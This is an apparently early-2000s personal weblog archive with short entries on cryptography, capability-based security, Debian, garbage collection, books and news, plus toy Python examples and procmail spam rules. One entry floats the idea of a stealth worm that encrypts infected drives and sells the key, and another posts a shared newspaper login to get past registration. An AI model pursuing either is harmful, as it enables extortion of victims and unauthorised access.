I think, Stephen, that most people have realised that long ago. Certainly people who had looked at crypto. I mean, it's spelt out word for word in Cryptonomicon (the chapter about LPW and organ). LFSRs were the mainstay of military crypto for years and were very well studied. Maybe I'll think more highly of this book as I get more into it.

The Beauty of Fonts

This [via Raph] is a good discussion of why so much has been said about unhinted AA recently. Just look at Chimera - that's nice. Unfortunately, since I run Xinerama I can't have XRENDER as well, at least in 4.1.0. Maybe 4.2.0 will fix it, but Debian doesn't have it yet (thou I note that Gentoo does).

(as an aside, Freetype have a cool new, fontish, logo)

CSS

As a rule of thumb - if it isn't broken in konqueror then I don't know about it. Pill pointed out that Mozilla (and other Gecko based browsers) didn't like the CSS because publicfile was returning the MIME type as text/plain. Fixed that in a very DJB way, the name of the CSS file is now iv.css.text=css.

Well, IV is still down as...

Well, IV is still down as I write this, but I'm bringing it up tomorrow and taking my laptop to its 2Mbps connection to download some stuff. Upgrading Debian for one (so I can drive my Aironet card) and I'll try to download this. It's a 143MB (5 hour) MP3 of someone called Zigmund Void. The first bit sounds weird (I wondered if the file was corrupt) but nym assures me it's quite good.

Although a perfectly good day, I'm a little down. Firstly Zooko's hard drive died and took many unfinished papers and films of Irby with it. In the future I guess he'll back up, but there's something heart tearing about data loss like that. Maybe it's a sign of geekiness that I get upset by that. He's saving up to send it to DriveSavers but they cost lots. (you can always tell that if they don't have prices on the website then the cost is too high).

And for those unconcerned about the loss of millions of poor bits, then this made things worse. It's a record of what Europol wants to log given their new powers which I noted here before.

We need a short term solution to this problem (other than cutting these people up into lots of little pieces). Freenet/MNet and other such networks are long term and systems like Mixmaster are too difficult for most people. I don't know how much confidence I have given that most people seemingly couldn't care less but maybe something like Crowds (but with IRC and email etc too) would be ok.

I guess I'm more than a little depressed about human nature too. I have some thoughts about event-models and the like, but I don't feel like writing them up now

Imperialviolet will be do...

Imperialviolet will be down from sometime like 3AM BST tomorrow until BST morning Friday

It seems that

When I subscribe to mailing lists I use a lists.something@imperialviolet.org address so that if that email address ever gets used for spam I can subscribe under another address and direct all mail to the old address into /dev/null

Unfortunately, this interacts badly with mailing lists which (reasonably) require that the sender be a list subscriber. Good old mutt has send-hook commands in its config file which change the From address quite nicely.

That doesn't, however, change the envelope sender, but a quick look at the qmail-inject manpages shows that setting the Return-Path header will do that fine. Unfortunately, mutt strips Return-Path headers before sending (set one in a message, send it and then look at it in your outbox - it's gone). After grepping the mutt source and sending many test messages, deltab finally sorted it out - put set envelope_from in your .muttrc and all is solved. Thanks to all the #infoanarchy people who helped. (I'm just blogging this to help others and because I know I'll need it again at some point in the future)

Still reading Structure and Interpretation of Computer Programs and have just finished Garden of Rama (AC Clarke and Gentry Lee). It's pretty cool scifi - not hard scifi nor stunning - but a good read.

Software Fault Prevention by Language Choice...

Software Fault Prevention by Language Choice: Why C is Not my Favourite Language [via DNM]

The following is a result of an IRC conversation with Zooko and tvoj and may well only make sense if one was a part of that conversation

This article (from the E homepage) suggests that capability systems cannot stop communicating conspirators. I think that either the author of that (MarkM?) or myself are misunderstanding something here. Capabilities can stop communicating conspirators (I'll show that in a sec) - but part of the situation definition in the article is "Bob may also communicate with Mallet" - which is a different problem. The article is, I think, talking about the following situation:

A has a capability cap and can communicate with B. A and B wish for B to be able to use cap but A cannot transfer cap to B

In that situation A can proxy requests for B and in that way B can use cap

Now, there is a separate discussion about a different situation. I think we were confusing the two last night. The situation this time seems to me to be:

A has access to secret information and wishes to communicate/leak this to B. The capability system seeks to prevent this

Now I think that a capability system can ensure this. Proof by induction: Suppose for a moment that A and B have no capabilities. Thus they cannot do anything at all and so cannot communicate. If you only give them access to objects that do not allow communication then neither can communicate.

The problem is that the number of objects which do not allow communication is small and it's hard to find them. (I should mention at this point that this is a problem that Multics tried to solve - interested parties should Google for some papers from that).

If we give A and B access to integers and simple operations (add, multiply, divide) then they can perform simple tasks and still not communicate - even if we give them capabilities to the same integer objects. Integers are environment free (EF) - they have no state. An object which is environment free is also side-effect free and deterministic (the result only depends on the inputs). You can also think of side-effect free as "does not write to the environment" and deterministic as "does not read the environment". In the following I use deterministic (D) to mean merely deterministic, and the same for side-effect free (SEF).

Of course such properties only hold if the inputs are at least as strong. For example if you pass a deterministic object to an environment free function, then that function may set some global variable through the input.

To stop A and B communicating you must stop their environments from touching. You can give them EF objects with no problem. You can give them EF and SEF objects with no problem, same for EF and D objects. However, as soon as they have SEF and D objects you may have a problem as the D objects could write to something which the SEF objects could read.
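A toy Python version of that last case, using the definitions above (all the names here are made up for illustration). The writer never reads the environment, so it is merely D; the reader never writes to it, so it is merely SEF; `add` is EF. Hand A the writer and B the reader over the same bit of environment and you have a channel:

```python
class Env:
    """A shared piece of environment (hypothetical)."""
    def __init__(self):
        self.cell = 0

def make_writer(env):
    """Merely deterministic: never reads the environment, but writes to it."""
    def write(bit):
        env.cell = bit  # side effect; the (None) result ignores env
    return write

def make_reader(env):
    """Merely side-effect free: never writes, but reads the environment."""
    def read():
        return env.cell
    return read

def add(a, b):
    """Environment free: no reads, no writes, so no channel."""
    return a + b

def leak(secret_bits, write, read):
    """A holds `write`, B holds `read`; one bit crosses per round."""
    received = []
    for bit in secret_bits:
        write(bit)               # A's side
        received.append(read())  # B's side
    return received

if __name__ == "__main__":
    env = Env()
    print(leak([1, 0, 1, 1], make_writer(env), make_reader(env)))
```

Give both parties only `add` and there is nothing for `leak` to be built from, which is the EF case.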

Now, if A and B are running on the same computer then they share objects like the CPU. Give B a clock and they can communicate via the lengths of time-slices etc. Give them the ability to malloc and they may be able to communicate via the VM etc. This is why it's such a hard problem.

I got Amphetadesk working...

I got Amphetadesk working by sending the Perl libs it couldn't find to the apt bot on #debian and installing the packages it said. Only worked for 0.91 thou. At least I know that my RSS feed works.

TBL (not Tim Berners-Lee, another one - who is, I think, the smartest person I've ever met) recommended The Structure and Interpretation of Computer Programs a while back. Well, I found it online (legally) today, via this page. Reading it on my laptop now.

This is very sweet

Android Generated for Gratification and Logical Exploration

ESR has a weblog! (and it's pretty good). A bit gun mad, but that's always been a problem with Eric

Suggested reading: Notes ...

Suggested reading: Notes from the BPDG (fuckware) meeting, BBC article about the new EUP rules on data protection and privacy, Another BBC article about the large fall in street crime in Lambeth (following a relaxing of cannabis laws)

A little while ago, it was found that irssi was backdoored at the source level (someone cracked the server and altered the source). Now it's been found that fragrouter suffered the same thing (search BUGTRAQ archives). Two points from this: in the short term we need a little more crypto and in the longer term we need to fix the god-awful UNIX security model.

Irssi has started signing releases at least, but personally I still can't believe that Debian doesn't. It's really not rocket-science and the code support is there (deb-sigs). The general argument is that the number of Debian developers means there are too many keys that could be compromised. Guess what? It's still better than nothing. (As an aside, Debian still doesn't have incremental updates to the Packages file - Debian sucks in too many ways).

In the long term we need to do something about the UNIX security model. The research has been done - that isn't a problem. But I'm lazy. I might quite like to play with more secure systems, but they are marked out by being unusable. Of course, I'm not working to create an EROS distribution or anything so I don't really have the right to complain. Maybe something like this [via Wes] will stay us in the short term.

This looks like a cool re...

This looks like a cool resource for optimising PHP. I haven't done any PHP for a while thou

Be sure to check out the links from Zooko's weblog for 5/27.

Picked up my photos from the school prom today and scanned them in. My scanner is pretty rubbish. People usually look pretty bad in photos, and after I've scanned them, they look even worse. Anyway, they're here

This link was mentioned on infoanarchy on why ATM is a bad idea. I don't really know much about this, but it seems pretty persuasive. Then again, if I had so much money I could even consider an ATM network I would be pretty happy!

Dan Moniz pointed out that...

Dan Moniz pointed out that I've been a total id10t and linked to sweetcode.com, not .org, which is why it's been saying "For Demos". Stupid me.

IV also has an RSS feed now

Also, thanks to Pill for pointing out that mozilla was rendering link borders around the permalink images and for giving the CSS code to fix it. (IMG { border : 0 none; }, BTW)

IV now has permanent URLs...

IV now has permanent URLs for each entry in the archives for anyone who wants to link to a specific entry. Copy the link from the image to the left of the time lines

This is getting silly - caffeinated soap for a wake up in the shower. About 250 milligrams of caffeine per shower is absorbed through the skin. Weird.

Projected deaths in a Kashmir nuclear war. Newscientist is broken with most browsers (it returns an "unavailable at the current time" page). Faking the User-Agent seems to do the trick

This paper has been doing the rounds (thanks to tav on #esp for the link). Kind of scary what a determined idiot could manage to do. So who's going to write a worm which uses stealth-spreading and strikes, encrypting all the hard drives of computers it infected? How much do you think you could sell the key for? (credit to Ian for that idea)

It seems that NASA is set on a manned mission to Mars after the discovery of millions of tonnes of ice just a meter under the surface.

So is NASA going to give up on the ISS and try to capture the nation's imagination (and wallets) with the first manned mission to anywhere since the Moon? The ISS has cost $40 billion so far (it should have cost $8 billion and been finished in 1992) and there's no end in sight. The Russians don't have the money, NASA is practically bankrupt after bad accounting practices were revealed in June 2001 and the other members (European, Canadian and Japanese space agencies) are fed up with the whole project.

Goldin (who ran NASA throughout the 90s) said NASA was going to be "Faster, better, cheaper" after the loss of the $1 billion Mars Observer. Wouldn't the faster, better, cheaper option be another unmanned mission? It doesn't have the glamour, but you have to question the reasons why NASA is doing this. Science or PR? What does a manned mission offer?

BBC piece about the EU En...

BBC piece about the EU Enforcement Directive (an addition to the copyright directive). What they want this time seems to be that all CD/DVD presses put ID numbers on CDs and more powers to search.

AaronSw is pissed with the W3C

BBC News article about the water on Mars that I would have linked to had I had it around earlier

And an article about NASA's money problems (SciAm).

Essential Blogging by O'R...

Essential Blogging by O'Reilly is in draft form for download (ZIP file of PDFs). Deals with using common blogging tools and a little about blogging community. Worth a skim even if you blog with XHTML and a few custom Python scripts like me

This is quite a neat little utility for modern IDE drives. It uses the SMART interface to read the temperature sensor and spits the value back out. I didn't even know IDE drives *had* temperature sensors built in.

I'm not sure what's going on with Sweetcode. It just reads "For Demos" and has done for quite some time. No one seems to know what Demos is (other than the plural of demo).

Two of my four SCSI drives seem to fail to startup until they've been on for a few minutes. I'm pretty sure it's not the drives (since it's two of them at exactly the same time). I'm thinking maybe I shouldn't have used a cable from the "SCSI Bucket of Bits" from work.

From Ian:Actually, this i...

From Ian:

Actually, this is my assessment too - I have been saying for a while that Quantum Computers will cause us to revert to a situation where secure practical crypto was the exclusive preserve of the wealthy and powerful (ie. those that can afford Quantum Crypto).

Perhaps you should email Mr Singh and ask his opinion of it.

I will

Another Paul Graham link

School's out for ... ever...

School's out for ... ever

Scary

Ok, I've improved the IV ...

Ok, I've improved the IV generating scripts to break up blog entries into 10 on the front page and a series of archive pages (20 entries each). You can access the archives from links at the bottom of every page.
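The splitting itself is about as simple as it sounds. A sketch of the idea in Python (not the actual IV scripts; the function name is invented, and it assumes entries are held newest-first and that the archive pages pick up where the front page stops):

```python
def paginate(entries, front=10, per_archive=20):
    """Split newest-first entries into a front page and archive pages."""
    front_page = entries[:front]
    rest = entries[front:]
    archives = [rest[i:i + per_archive]
                for i in range(0, len(rest), per_archive)]
    return front_page, archives

if __name__ == "__main__":
    front_page, archives = paginate(list(range(55)))
    print(len(front_page), [len(page) for page in archives])
```

One thing this glosses over: counting archive pages from the newest end means an entry moves to a different page as new entries arrive, so links to a specific page would need the pages numbered from the oldest entry instead.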

I went to a talk by Simon Singh (author of The Code Book) on Wednesday (part of the Cheltenham Science Festival). It was a crypto talk (nothing I didn't know already really, but very well done and with a real live demo of an Enigma) during which he went through the solutions to some of the 10 challenges he sets at the end of The Code Book. Nothing remarkable here except that he admitted that the toughest code to crack (RSA wrapping 3DES) was done wrong. Rather than Enc1Dec2Enc1 he did Enc1Dec1Enc2 - which is just the same as single DES. Implementation issues again.
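Why the wrong order collapses: Dec1 immediately undoes Enc1, so all that's left is Enc2. That holds for any cipher, so a toy one is enough to show it. The 8-bit "cipher" below is invented for the demo and is emphatically not DES; the only property it needs is that `dec` inverts `enc`.

```python
def rotl8(x, r):
    return ((x << r) | (x >> (8 - r))) & 0xFF

def rotr8(x, r):
    return ((x >> r) | (x << (8 - r))) & 0xFF

def enc(k, m):
    """Toy 8-bit block cipher (NOT DES): add key, rotate, xor key."""
    return rotl8((m + k) & 0xFF, 3) ^ k

def dec(k, c):
    """Inverse of enc for the same key."""
    return (rotr8(c ^ k, 3) - k) & 0xFF

def ede_intended(k1, k2, m):
    """Enc1 Dec2 Enc1: the intended two-key triple encryption."""
    return enc(k1, dec(k2, enc(k1, m)))

def ede_broken(k1, k2, m):
    """Enc1 Dec1 Enc2: the first two steps cancel out."""
    return enc(k2, dec(k1, enc(k1, m)))

if __name__ == "__main__":
    same = all(ede_broken(k1, k2, m) == enc(k2, m)
               for k1 in range(256) for k2 in range(0, 256, 17)
               for m in range(256))
    print("broken EDE equals single encryption under key 2:", same)
```

So an attacker only ever has to find key 2, and key 1 contributes nothing.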

But the part that got me thinking was a little aside when he said that Quantum computers might cripple factoring schemes, but that's ok because we have Quantum crypto. Now I need to go look up exactly what algorithms exist for QCs - but if we assume that it breaks all pubkey systems we know then Quantum crypto doesn't replace current crypto at all. It requires a direct fibre link in order to preserve the all-important quantum states of the photons. This puts us back to the days where very few people have crypto (those who can afford direct fibre links between themselves) - a major step back.

It would be a sorry state if this happened - someone please reassure me that it won't.

From pupok:I realised rec...

From pupok:

I realised recently that people from the UK have a different sense of what things are appropriate to talk about publicly. It is extremely well-defined. I do not possess it at all,

Really? I don't even notice it. I guess IV is very non-personal and I would feel awkward about posting some things here. But there is a little of that good old British stiff-upper-lip around - but very little

I'm not sure about this site yet. Looks very complete and well designed but I haven't really had a chance to read much of the content yet. Doesn't really matter if someone pulls off a singularity

Landscape page updated. Metis was down for a while today since the IP address jumped (again!). Damn Telewest keep on telling us that it's static. They now say, however, that it really will be after maybe one more jump. Wonderful

Followup to Paul Graham's Revenge of the Nerds, here. Thanks to AccordionGuy.

<AccordionGuy> The next plan of course, if for Chancellor Grahamtime to propose creating an army of the Republic to crush the separatists.
<agl> if he does, then at least we get a cool film out of it :)
<agl> does Dennis Ritchie play Yoda then?
<rik> agl: "Yes. The C is strong with this one."
<coderman> i cast my vote for Bjarne as Count Dooku
<rik> "Edit code in vim he does. Mmm."
<AccordionGuy> a.k.a. Darth Templatus.
<AccordionGuy> Count Do-Loop.
<AccordionGuy> Who are Anakin and Padme, then?
<Loki> paul vixie and the chick at the head of RIPE, forget her name.
<AccordionGuy> If either Kemeny or Kurtz (BASIC) were still alive, they could play Jar Jar.
<AccordionGuy> I vote for Larry Wall and Guido van Rossum as C-3P0 and R2-D2.
<coderman> lol
<JDarcy> RMS as J. Random Ewok
<coderman> RMS looks like an ewok. sorta
<AccordionGuy> I was thinking of RMS as Dex, the greasy spook cook. They look like they have the same hygiene habits.
<AccordionGuy> I was thinking James Gosling as Jabba, since we already call Java "Jabba" on this channel.
<AccordionGuy> "Hoh, hoh, hoh, anonymous inner classes are my kind of scum."
<AccordionGuy> Cobol would be poor old Chancellor Valourum, who got ousted in Episode I.

Downtime: Metis (and thus...

Downtime: Metis (and thus IV) will be down from early June 5th for about 2.5 days while the language center is wired up at school. Zooko has very kindly offered to be backup MX during this time

Today was the last semi normal school day. I'm not in tomorrow, I have exams all Thursday and Friday will just be wild. Biology practical went fine this morning (even though the exam board contacted school yesterday and told them that the experiment doesn't actually work and to just give us the results). It feels very weird to be finishing school - I can't remember not going to school. Feeling displaced

I've written up the starting notes on Landscape. It's just a bitch about the importance of IDEs at the moment - not even sure if I want people reading it yet. I guess my main point about IDEs is separate at the moment and not clouded by any sketches of LS proper yet

A new addition to the Common Links: E7L3. My common links are so incomplete at the moment but it's fascinating to see social webs in action. With blogs you can actually see the arcs of similar interest. Now I want a tool that gathers recent blog entries and cross links them by keywords. Answers on an email to agl@imperialviolet.org. (I know IV is guilty of not having an XML version - I will fix this at some point)

New article from Paul Gra...

New article from Paul Graham

This site runs some pretty sweet music in MP3 format (thank god it's not all RealMedia or WinMedia)

Following a link from JWZs weblog to here which has lots of really neat stuff on fractals and the like

Joey on Attack of the Clones...

Joey on Attack of the Clones (which I watched yesterday). The love scenes are, quite frankly, pants and if I had been editing it most of them would have been left where they belong (on the cutting room floor). However there is more than enough action to make up for it and Yoda with a lightsaber is worth the ticket alone! Go see it.

Aaron has posted an annotated ETCon programme with links to the blogs which covered each session.

Wolfram's book is out (and my order is lodged with Waterstones). Wired have some good, extensive coverage. But, unfortunately, it doesn't look like Wolfram Research Europe are getting any copies until the end of the month, so god knows when I'll get mine.

I've now taken to leaving notes for myself in root.inc (the file which generates this page) and it works pretty well

Don't you just wish you h...

Don't you just wish you had a digital camera which could take pictures like this or this? That could almost be rendered - ouch. (bigger versions for those on a better connection, play with the URL to get 1024x768 and 2272x1704).

Frost looks like a very interesting extension to C++ (it's not general as far as I know, only for G++). It allows multimethod dispatch with syntax like:

void func (virtual wibble & arg) { do_something_to_wibble_objects (arg);}

Just great. Go read it.

Some good procmail rules for filtering spam out (works really well for me)

:0
* Subject: ADV:.*
spam

:0
* Subject: .*\.\.\.\.\.\.\.\.\.\.*
spam

:0
* Content-Type: .*charset="ks_c
spam

:0
* Content-Type: .*EUC-KR
spam

Ah, at last. Maybe something...

Ah, at last. Maybe something which can explain what the hell Aspect Programming is (I expect I'll be disappointed).

GCC 3.1 is out (changelog). And they have an MMIX backend! Woohoo, now all I need is a JIT compiler to translate MMIX into IA32 to run it

An article on arch (the CVS replacement)

About 6 people have put their keys through the verifier and it seems to be working pretty well now that I've hacked the GPG source to stop it asking questions. GPG is a total bitch to interface with - we need 1.1 with the g10 library.

Well, I now have 4 of the...

Well, I now have 4 of the 5 aforementioned SCSI drives in a RAID 0 array (I can't fit all the drives in the case). Nice to see my PSU didn't melt and it's pretty sweet speed-wise. You mke2fs and the count shoots up to about 120 right away. Then all the drive LEDs light up and the room shakes for a couple of seconds before the mke2fs finishes

Another Lisp Love story

Five Little Languages and How They Grew

NYTimes story about how a company is buying out a whole town (for 20 million dollars) in order to stop the people suing them over pollution. (registration required for NYT - try user:strsnyt, Password:strsnyt). You gotta love the American disregard for the environment. Five percent of the world's population and 25 percent of the pollution.

New articles on SciAm

New project time! A big w...

New project time! A big welcome to the key verifier. As much as we would like the web of trust of GPG keys to work, most people don't know enough people who use GPG for it to work. So as a little helper (and a pretty small one at that) the key verifier will sign your key once you've proved you control the email address in the UID. Thanks to AaronSw and Ian for testing it out.
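One way to do the "prove you control the address" step is a mailed challenge token. The Python below is only a sketch of that idea, not the verifier's actual code: `SERVER_SECRET`, `make_challenge` and `check_response` are made-up names, and it assumes the token is mailed to the address in the UID and has to be sent back before the key gets signed.

```python
import hashlib
import hmac
import secrets

# Hypothetical per-server secret; never leaves the verifier.
SERVER_SECRET = secrets.token_bytes(32)


def make_challenge(fingerprint, email):
    """Token to mail to `email`; binds the key fingerprint to the address."""
    msg = f"{fingerprint}|{email}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()


def check_response(fingerprint, email, token):
    """True if `token` is the one that was mailed for this key and address."""
    expected = make_challenge(fingerprint, email)
    return hmac.compare_digest(expected, token)


token = make_challenge("ABCD1234", "someone@example.org")
ok = check_response("ABCD1234", "someone@example.org", token)
```

Because the token is derived from the fingerprint and address, the server doesn't need to remember outstanding challenges; anyone who can return the token must have read mail sent to that address.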

Introduction to the Semantic Web. It would be nice if this works. At least the SW people realise that they are never going to create a pretty system if it's going to be worldwide, I only worry that because they're aiming pretty low, they are going to hit far too low. Time will tell.

JWZ has a new weblog. For those who don't know, JWZ is famous for lots of things: writing xscreensaver, working at Netscape/Mozilla for a while, owning the DNA lounge and (most of all) for ranting

USENIX2001 report. Ok, so it's from last year - doesn't mean it's not interesting thou! (from Lambda).

I was looking about for places to take me on for the summer yesterday. (It's stunning how disinterested people suddenly become when you mention internship). On the top of my (remaining) list was a company called Innovative Software which I was going to call today. And guess what the headline on the local paper is?? Microsoft sues Chelt Computer Company. I guess there's a chance they might be looking for a Linux knowing intern now - but more likely they are just going to get swatted.

Matrox's new card is out. Drooooool.

One virus has infected an...

One virus has infected another. Namely CIH and Klez to make a fast spreading, nasty payload virus.

Befunge is a language with a 2D `memory' where the IP (instruction pointer) advances in one of four directions. Crumbs
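To make the 2D idea concrete, here is a tiny interpreter sketch in Python. It only handles a handful of Befunge-93 instructions (the four arrows, digits, `+`, `.` and `@`), and `run_befunge` plus the three-line program are made up for this illustration.

```python
def run_befunge(source, max_steps=10_000):
    """Run a small subset of Befunge-93 and return the printed numbers."""
    grid = source.split("\n")
    width = max(len(row) for row in grid)
    grid = [row.ljust(width) for row in grid]
    x = y = 0          # the instruction pointer starts top-left...
    dx, dy = 1, 0      # ...heading right
    stack, out = [], []
    for _ in range(max_steps):
        c = grid[y][x]
        if c == ">":
            dx, dy = 1, 0
        elif c == "<":
            dx, dy = -1, 0
        elif c == "^":
            dx, dy = 0, -1
        elif c == "v":
            dx, dy = 0, 1
        elif c.isdigit():
            stack.append(int(c))
        elif c == "+":
            stack.append(stack.pop() + stack.pop())
        elif c == ".":
            out.append(str(stack.pop()))
        elif c == "@":
            break
        # Move one cell in the current direction, wrapping at the edges.
        x = (x + dx) % width
        y = (y + dy) % len(grid)
    return " ".join(out)


# Push 2 and 3, turn down, add, turn left, print, stop.
program = "23v\n  +\n@.<"
result = run_befunge(program)
```

The program text is the memory: the pointer walks right along the top row, turns down at `v`, and comes back left along the bottom row to the `@`.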

Nice is the nicest (no pun) Java based language I've seen in a long time. It uses an ML type system (pretty much the best one around) and compiles to Java byte code. Very, very sweet. Need to play with this a bit.

Debian finally has GNUPG 1.0.7! All apt-get

Details of the new Matrox card are surfacing (also see /.). I'm still very happy with my G400. In other aggle hardware news, I've now got an SLI MegaRAID SCSI controller and 5 9GB UW3SCSI drives to make a nice RAID array with. I just need a SCSI cable with enough connectors and a power supply which won't melt now.

A video of a Lisp Machine in action. I'll have to download this at school as it's a little big. Lisp machines were waaay cool thou.

Imperialviolet's DNS has ...

Imperialviolet's DNS has been upset for the last couple of days as netsol get off their fat arses and update stuff. DNS sucks. I might design a replacement.

I'll catch up tomorrow evening with posting stuff

GZigZag has renamed itsel...

GZigZag has renamed itself to GZZ and moved to Savannah (from SourceForge). GZZ is a free, Java implementation of Ted Nelson's ZigZag. It's a neat idea and something like it plays a large part in my plans for total world domination.

Ian has an article on CNet about Freenet and Sept 11th. It's worth a read, or at least a skim

The Mouse Genome is now online if you like that sort of thing. And (better yet) it looks like it's free (in both speech and beer). BBC article

Maybe I should see a doctor about my nosebleeds. They don't happen often, but when they do - boy does it bleed. At least I didn't pass out this time.

Metis now has a TLS (the protocol formerly known as SSL) enabled MTA

Roger Dingledine has rele...

Roger Dingledine has released the first draft of the Mixminion design paper. Remix is pretty much dead as the only reason I started writing it was to try my hand at RSA coding - so go read it and pass comment. Maybe when exams are over I'll help with Mixminion because, let's face it, Mixmaster is getting a little long in the tooth.

IV now validates as XHTML...

IV now validates as XHTML 1.0 Strict! (well, the front page at least). The W3C validator sometimes needs a few refreshes to connect to IV thou.

Wes has a link to this interesting page on XHTML+MathML+SVG. Maybe this could actually be a decent typesetting system.

Just finished Diaspora by...

Just finished Diaspora by Greg Egan - wow. The scope of this book is stunning as is the author's grasp of maths and physics. How many other authors explain all the reasoning behind their ideas?

After about 4 weeks tryin...

After about 4 weeks trying, Smiths have given up and said that the new True Names book is out of print, despite the fact that it was published in December 2001! This is a sucky country to get books in

Some links:

If anyone knows Aspect Orientated Programming I want them to email me an example of why I would want to use it. (you know, like the example of GUIs which is always used for OOP).

Stackless Python (whichI'...

Stackless Python (which I'm sure I've mentioned here before) is moving towards a Limbo [1, 2, 3] model of microthreads.

Maybe an interesting book: IA-64 Linux Kernel

Wolfram's book of about 10 years is coming out soon (May 14 so says the website - but that might slip).

Kotako is being dehosted ...

Kotako is being dehosted as of June 1st after years of fine service (kotako runs linuxpower.org). So I'm moving my mail to imperialviolet.org - which involves re-subscribing to far too many mailing lists - but I'm getting there. Maybe I can get linuxpower.org's MX pointed to mail.imperialviolet.org so I can run a forwarding service for a while.

This was posted to Slashdot - but I don't care I'm going to post it here too because it's a really great list of major software bugs. It's nearly all `physical effect' bugs thou (for example it doesn't count things like the Ping Of Death). Funny reading - if a little scary

I think I've got a decent grip on Garbage Collectors now and damn, it's a nasty problem. I have a few design ideas which I should write up at some point.

The Bloody Sunday Inquiry has demanded that two Channel 4 journalists reveal anonymous sources, on pain of contempt of court. Quite frankly I don't see how you could hold such a court in anything but contempt. If the sources had not been granted anonymity then they would never have said anything - the inquiry should be grateful for what they have. Forcing disclosure will only damage future inquiries and alienate people against this one. At least the two reporters have refused for the moment. (Guardian story with some great quotes from the reporters).

Another good story (and another link to the Guardian). I wonder if you could retrofit a computer to a car (a proper computer) and live your whole life in a car? Drive-thru everything, wireless internet access, a postal box to get your internet ordered stuff delivered (it would have to be drive-thru of course). You would be the totally mobile citizen, telecommuting and living out of your car. The only problem I can't work round (reasonably) is toilet stops. But I suppose you could have a toilet fitted and store the waste somewhere in the car until you find a place to, erm, dispose of it.

I'm sure people have seen Jamie Kellner's `views' on PVRs. If not - see the Slashdot story. Comments about the stupidity of this guy aside (and I loved Ian's Tivo) it seems to me this is an example of the Tragedy of the Commons. As long as people watch adverts on TV (actually, for as long as marketing people think they do) - everyone gets free content. However, some people can skip the adverts (either by not watching or by using PVRs) and get free content without suffering the adverts. And let's face it - nearly all adverts are just painful. This works until too many people do it and marketing people realise that ads don't work and so people have to pay for content.

Now, I really don't want to be seen to be agreeing that "PVR Users Are Thieves" (because I'm not) - but it looks like the current system is fundamentally unstable and will fall at some point. Now the thing not to do is to try to pin reality somewhere it doesn't want to be with laws and fuckware which force people to watch adverts (HDTV and the like). One point where the link with the T of the C fails is that in true T of the C situations everyone is worse off afterwards. I don't see that this is true in this case. I wouldn't have a problem paying for what little TV I watch if it were advert free (assuming a decent micropayments system).

But then people will be trading DivX's of shows and they'll still be bleating about users being thieves. And you can bet they'll still be trying to pin reality with laws and fuckware. Sigh.

Paradigms of AI Programming

Woody not going to make release tomorrow. (but who doesn't track unstable anyway??)

A Retrospective on Paradigms of AI Programming has been updated

I'm reading up on Garbage Collection at the moment. Microsoft's .NET GC implements the write barrier by watching for dirty pages - but that gives 4K granularity, which is pretty poor. But the thought of a write barrier in the code at every pointer write isn't exactly nice either.
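The granularity trade-off can be put in numbers with a toy model. The Python below is only an illustration and says nothing about how any real collector is built: `CardTable` is a made-up class, the 128-byte card size is an arbitrary choice, and "rescan" just means the bytes a collector would have to look through to find the pointers that changed.

```python
class CardTable:
    """Toy dirty-region tracker: one flag per `card_bytes` of heap."""

    def __init__(self, heap_bytes, card_bytes):
        self.card_bytes = card_bytes
        cards = (heap_bytes + card_bytes - 1) // card_bytes
        self.dirty = [False] * cards

    def write_barrier(self, address):
        # Called on every pointer store: mark the region holding `address`.
        self.dirty[address // self.card_bytes] = True

    def bytes_to_rescan(self):
        # Every dirty region has to be scanned in full.
        return sum(self.dirty) * self.card_bytes


HEAP = 1 << 20
pages = CardTable(HEAP, 4096)   # page-protection style, 4K granularity
cards = CardTable(HEAP, 128)    # explicit barrier with small cards (assumed size)

for address in (0, 5000, 70000):   # three scattered pointer writes
    pages.write_barrier(address)
    cards.write_barrier(address)

page_cost = pages.bytes_to_rescan()
card_cost = cards.bytes_to_rescan()
```

Three scattered writes dirty three 4K pages but only three small cards, so the fine-grained table leaves far less to rescan. The price is the extra store on every pointer write, which is exactly the bit that isn't nice.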

More on the EUCD (DMCA for the EU). Does anyone else feel political jetlag? I thought you had to be older for that to set in. Maybe we should abolish politicians (I don't think I actually agree with that page thou).

And here's today's (badly spelt and lacking grammar) message from our sponsors:

it's official Linux is pant s cause it doesn't support all of the messenger icons - go out and buy up xp all u linuxites" - will merrett CEO of willmerrett corporation the biggest company worldwide by 2020 and runnin on windows!

Google has launched a new...

Google has launched a new service in beta (requires HTTPS)

Currently nostalgia tripping on New Order - Shellshock and Screenwriter's Blues (finally found MP3s of them, lyrics for SB at the bottom of the page)

CERT working with a new language for doing simulations of complex systems [Link has broken since then]

And today's random link is this

Well, I take it back abou...

Well, I take it back about Kompressor after Zooko pointed me to some of her better works (namely Attack and Release and Never Talk to Strangers).

I read this in the latest issue of New Scientist:

The depression had hit, and the town had thousands out of work and little money in the municipal coffers. So the mayor printed his own. The value of the Worgl "stamp scrip" was set to automatically depreciate: that is, it earned negative interest. Once a month, its holders had to pay a "stamp" fee of 1 per cent of the value of the note. The result was that everyone spent the new money in the town as fast as possible. The streets were re-paved, the water system rebuilt, new houses appeared, then a ski jump, a new bridge. Some 200 other Austrian towns came up with plans to copy it, the central bank panicked, and it became a criminal offence to issue currency.

That's pretty stunning. I always wondered what the basis of the fiscal system was - thinking it must be pretty stunningly complex and well thought out. I'm pretty much of the opinion that it's not thought out at all and just works because of luck and is designed by powerful conservative, neophobic organisations.

Some other links which mention this story:

I'm sure you can all Google for other links as well as the next person

My book of the moment is Advanced Compiler Design and Implementation (1558603204) (Table of Contents). It's a real blood stopper when you open it on your lap, but it's a really good book (from what little I've read) as this stuff is pretty difficult to dig up off the net. More when I've finished it.

Looking to build some kiosk boxes (Internet access only) at school so I set a P75 (16MB of memory) building Gentoo. 20 hours later it had only got to building gcc (the first time) so I scrapped that idea and installed Gentoo chrooted on metis (Gentoo is cool in that you can do that sort of thing) and copied it over.

Ouch is it slow loading galeon! I'm talking 5-10 minutes to load and display a web page. And that's after having to run X on the frame buffer because it can't seem to drive the Mach64 card. I'm going to have to look at a lighter weight solution. (maybe netscape is smaller - I'm sure the memory is the major problem).

This is today's really random link. Quite a few broken links on the page - but still lots of (maybe) interesting stuff.

Welcome to the new, NS4 f...

Welcome to the new, NS4 friendly, Imperialviolet. This is where agl stops playing web designer and goes for something simpler. Bitch away if you will. I need to improve the scripts which generate IV to handle these blog entries so I can limit the number of entries per page.

Zooko's blog links to a song called Rappers We Crush by Kompressor. I can't say it's at all to my liking - but the girl on the Kompressor page is really cute .

This link is Kuro5hinated at the moment - but I want a go once it's up again.

